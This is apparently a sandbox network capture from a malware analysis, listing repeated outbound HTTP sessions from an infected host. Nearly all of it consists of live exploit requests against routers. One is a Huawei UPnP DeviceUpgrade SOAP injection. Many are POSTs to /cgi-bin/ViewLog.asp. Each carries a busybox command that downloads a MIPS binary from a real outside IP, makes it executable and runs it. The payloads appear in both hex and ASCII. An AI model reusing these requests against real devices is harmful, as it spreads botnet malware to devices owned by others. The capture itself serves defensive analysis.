                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:48.644676924 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:19.107417107 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              261192.168.2.146000294.122.21.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:18.985099077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              262192.168.2.144618885.105.190.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:18.999286890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.954153061 CET430INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 07:20:27 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              263192.168.2.144245885.128.69.2168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:19.197216034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.411376953 CET932INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 682
                                              Date: Thu, 23 Nov 2023 04:16:19 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 39 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.96</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              264192.168.2.145547094.122.80.1318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:19.211654902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              265192.168.2.146044495.182.109.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:19.431497097 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              266192.168.2.143976831.136.179.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:19.865078926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.453913927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.605832100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.069684982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.677524090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.893069029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.580296040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.442734003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              267192.168.2.144902095.46.140.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:19.898926020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.119049072 CET430INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 06:15:20 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              268192.168.2.144331494.122.22.518080
                                              TimestampBytes transferredDirectionData
